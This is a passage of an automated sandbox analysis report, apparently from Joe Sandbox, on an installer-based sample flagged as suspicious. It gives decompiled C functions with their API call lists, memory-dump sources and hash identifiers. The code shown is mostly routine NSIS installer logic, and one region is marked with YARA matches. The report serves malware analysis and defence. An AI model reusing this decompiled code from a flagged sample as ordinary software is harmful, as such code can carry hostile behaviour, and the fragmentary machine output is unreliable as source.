                                                                                                                        • API String ID: 1892508949-2621469430
                                                                                                                        • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                        • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                        • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                        • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 60%
                                                                                                                        			E004020D8(void* __ebx, void* __eflags) {
                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                        				struct HINSTANCE__* _t31;
                                                                                                                        				void* _t32;
                                                                                                                        				WCHAR* _t35;
                                                                                                                        				intOrPtr* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t39;
                                                                                                                        
                                                                                                                        				_t32 = __ebx;
                                                                                                                        				asm("sbb eax, 0x434fc0");
                                                                                                                        				 *(_t39 - 4) = 1;
                                                                                                                        				if(__eflags < 0) {
                                                                                                                        					_push(0xffffffe7);
                                                                                                                        					L15:
                                                                                                                        					E00401423();
                                                                                                                        					L16:
                                                                                                                        					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t35 = E00402DA6(0xfffffff0);
                                                                                                                        				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                                                        				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                                                        					L3:
                                                                                                                        					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                                                        					_t47 = _t23 - _t32;
                                                                                                                        					 *(_t39 + 8) = _t23;
                                                                                                                        					if(_t23 == _t32) {
                                                                                                                        						_push(0xfffffff6);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					L4:
                                                                                                                        					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                        					if(_t36 == _t32) {
                                                                                                                        						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                        					} else {
                                                                                                                        						 *(_t39 - 4) = _t32;
                                                                                                                        						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                                                        							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                                                        						} else {
                                                                                                                        							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                                                        							if( *_t36() != 0) {
                                                                                                                        								 *(_t39 - 4) = 1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                                                                        						FreeLibrary( *(_t39 + 8));
                                                                                                                        					}
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t31 = GetModuleHandleW(_t35); // executed
                                                                                                                        				 *(_t39 + 8) = _t31;
                                                                                                                        				if(_t31 != __ebx) {
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        				goto L3;
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                          • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 334405425-0
                                                                                                                        • Opcode ID: 3c7220b09079b7540588f00d06919a83152283317973dfc2410971feeea201ab
                                                                                                                        • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                        • Opcode Fuzzy Hash: 3c7220b09079b7540588f00d06919a83152283317973dfc2410971feeea201ab
                                                                                                                        • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E00401B9B(void* __ebx) {
                                                                                                                        				intOrPtr _t8;
                                                                                                                        				void* _t9;
                                                                                                                        				void _t12;
                                                                                                                        				void* _t14;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t25;
                                                                                                                        				void* _t30;
                                                                                                                        				char* _t32;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t37;
                                                                                                                        
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                                                                                        				_t33 =  *0x40ce50; // 0x0
                                                                                                                        				if(_t8 == __ebx) {
                                                                                                                        					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                                                                                        						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                                                                        						_t34 = _t9;
                                                                                                                        						_t5 = _t34 + 4; // 0x4
                                                                                                                        						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                                                                                        						_t12 =  *0x40ce50; // 0x0
                                                                                                                        						 *_t34 = _t12;
                                                                                                                        						 *0x40ce50 = _t34;
                                                                                                                        					} else {
                                                                                                                        						if(_t33 == __ebx) {
                                                                                                                        							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                                                        						} else {
                                                                                                                        							_t3 = _t33 + 4; // 0x4
                                                                                                                        							E0040653D(_t30, _t3);
                                                                                                                        							_push(_t33);
                                                                                                                        							 *0x40ce50 =  *_t33;
                                                                                                                        							GlobalFree();
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L15;
                                                                                                                        				} else {
                                                                                                                        					while(1) {
                                                                                                                        						_t8 = _t8 - 1;
                                                                                                                        						if(_t33 == _t28) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t33 =  *_t33;
                                                                                                                        						if(_t8 != _t28) {
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							if(_t33 == _t28) {
                                                                                                                        								break;
                                                                                                                        							} else {
                                                                                                                        								_t36 = _t33 + 4;
                                                                                                                        								_t32 = L"Call";
                                                                                                                        								E0040653D(_t32, _t33 + 4);
                                                                                                                        								_t22 =  *0x40ce50; // 0x0
                                                                                                                        								E0040653D(_t36, _t22 + 4);
                                                                                                                        								_t25 =  *0x40ce50; // 0x0
                                                                                                                        								_push(_t32);
                                                                                                                        								_push(_t25 + 4);
                                                                                                                        								E0040653D();
                                                                                                                        								L15:
                                                                                                                        								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
                                                                                                                        								_t14 = 0;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        					_push(0x200010);
                                                                                                                        					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                                                                        					E00405B9D();
                                                                                                                        					_t14 = 0x7fffffff;
                                                                                                                        				}
                                                                                                                        				L17:
                                                                                                                        				return _t14;
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                        • String ID: Call
                                                                                                                        • API String ID: 3292104215-1824292864
                                                                                                                        • Opcode ID: 30569e39da44555291961ad64853d198300d6f9ab86d75038d444cc6ad9f290b
                                                                                                                        • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                                                        • Opcode Fuzzy Hash: 30569e39da44555291961ad64853d198300d6f9ab86d75038d444cc6ad9f290b
                                                                                                                        • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004022FF(void* __eflags) {
                                                                                                                        				WCHAR* _t34;
                                                                                                                        				WCHAR* _t37;
                                                                                                                        				WCHAR* _t39;
                                                                                                                        				void* _t41;
                                                                                                                        
                                                                                                                        				_t39 = E00402DA6(_t34);
                                                                                                                        				_t37 = E00402DA6(0x11);
                                                                                                                        				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
                                                                                                                        				if(E00406873(_t39) != 0) {
                                                                                                                        					 *(_t41 - 0x70) =  *(_t41 - 8);
                                                                                                                        					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
                                                                                                                        					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
                                                                                                                        					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
                                                                                                                        					_t27 =  *((intOrPtr*)(_t41 + 8));
                                                                                                                        					 *(_t41 - 0x68) = _t39;
                                                                                                                        					 *(_t41 - 0x64) = _t37;
                                                                                                                        					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
                                                                                                                        					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
                                                                                                                        					E0040559F(_t34, _t27);
                                                                                                                        					if(SHFileOperationW(_t41 - 0x70) != 0) {
                                                                                                                        						goto L1;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					L1:
                                                                                                                        					E0040559F(0xfffffff9, _t34); // executed
                                                                                                                        					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406873: FindFirstFileW.KERNELBASE(75AF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                          • Part of subcall function 00406873: FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                        • lstrlenW.KERNEL32 ref: 0040233F
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040234A
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1486964399-0
                                                                                                                        • Opcode ID: b1fc6ebd14e20afbf3d9adb2b12d8468a4ef83371132ba700f4899ad32413557
                                                                                                                        • Instruction ID: 04a4b26c59b21466d08f766bca7c88c70db01468de87939535198cd3568d8cbb
                                                                                                                        • Opcode Fuzzy Hash: b1fc6ebd14e20afbf3d9adb2b12d8468a4ef83371132ba700f4899ad32413557
                                                                                                                        • Instruction Fuzzy Hash: 40115A71D00314AADB10EFBAD949A9EB6B8AF04354F10843BA405FB2C1E6BCC9408B59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1029625771-1684325040
                                                                                                                        • Opcode ID: b7d50186bd7f9c119a5920ca895b3613a055e274bac28c2f0d01e77ab6c5d270
                                                                                                                        • Instruction ID: 4b9e4401d14134ae210e5b7fa96c6eb4b540eaa12224474db257589013c062b9
                                                                                                                        • Opcode Fuzzy Hash: b7d50186bd7f9c119a5920ca895b3613a055e274bac28c2f0d01e77ab6c5d270
                                                                                                                        • Instruction Fuzzy Hash: B4712675A00346DFDF31AF2889967DA37A2EF55360FE4407EDC4A8B216DB318985CB41
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E00401389(signed int _a4) {
                                                                                                                        				intOrPtr* _t6;
                                                                                                                        				void* _t8;
                                                                                                                        				void* _t10;
                                                                                                                        				signed int _t11;
                                                                                                                        				void* _t12;
                                                                                                                        				signed int _t16;
                                                                                                                        				signed int _t17;
                                                                                                                        				void* _t18;
                                                                                                                        
                                                                                                                        				_t17 = _a4;
                                                                                                                        				while(_t17 >= 0) {
                                                                                                                        					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                                                                        					if( *_t6 == 1) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_push(_t6); // executed
                                                                                                                        					_t8 = E00401434(); // executed
                                                                                                                        					if(_t8 == 0x7fffffff) {
                                                                                                                        						return 0x7fffffff;
                                                                                                                        					}
                                                                                                                        					_t10 = E0040136D(_t8);
                                                                                                                        					if(_t10 != 0) {
                                                                                                                        						_t11 = _t10 - 1;
                                                                                                                        						_t16 = _t17;
                                                                                                                        						_t17 = _t11;
                                                                                                                        						_t12 = _t11 - _t16;
                                                                                                                        					} else {
                                                                                                                        						_t12 = _t10 + 1;
                                                                                                                        						_t17 = _t17 + 1;
                                                                                                                        					}
                                                                                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                        						 *0x433eec =  *0x433eec + _t12;
                                                                                                                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                        • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                        • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                        • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00402434(void* __ebx) {
                                                                                                                        				long _t7;
                                                                                                                        				void* _t14;
                                                                                                                        				long _t18;
                                                                                                                        				intOrPtr _t20;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t23;
                                                                                                                        
                                                                                                                        				_t14 = __ebx;
                                                                                                                        				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                                                        				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                                                        				if( *(_t23 - 0x20) != __ebx) {
                                                                                                                        					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                                                        					_t18 = _t7;
                                                                                                                        					goto L4;
                                                                                                                        				} else {
                                                                                                                        					_t22 = E00402DE6(_t26, 2);
                                                                                                                        					if(_t22 == __ebx) {
                                                                                                                        						L6:
                                                                                                                        						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                        					} else {
                                                                                                                        						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                                                        						RegCloseKey(_t22);
                                                                                                                        						L4:
                                                                                                                        						if(_t18 != _t14) {
                                                                                                                        							goto L6;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2831762973-0
                                                                                                                        • Opcode ID: 26c7bbe08243d04bc546d5e796cf8e3d3467160ca4cc8197957f0192bba27813
                                                                                                                        • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                                                        • Opcode Fuzzy Hash: 26c7bbe08243d04bc546d5e796cf8e3d3467160ca4cc8197957f0192bba27813
                                                                                                                        • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1136574915-0
                                                                                                                        • Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                                                        • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                        • Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                                                        • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040690A(signed int _a4) {
                                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                                        				signed int _t10;
                                                                                                                        
                                                                                                                        				_t10 = _a4 << 3;
                                                                                                                        				_t8 =  *(_t10 + 0x40a3e0);
                                                                                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                                                        				if(_t5 != 0) {
                                                                                                                        					L2:
                                                                                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                                                        				}
                                                                                                                        				_t5 = E0040689A(_t8); // executed
                                                                                                                        				if(_t5 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				goto L2;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                          • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                          • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                          • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                        • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                        • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                        • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 68%
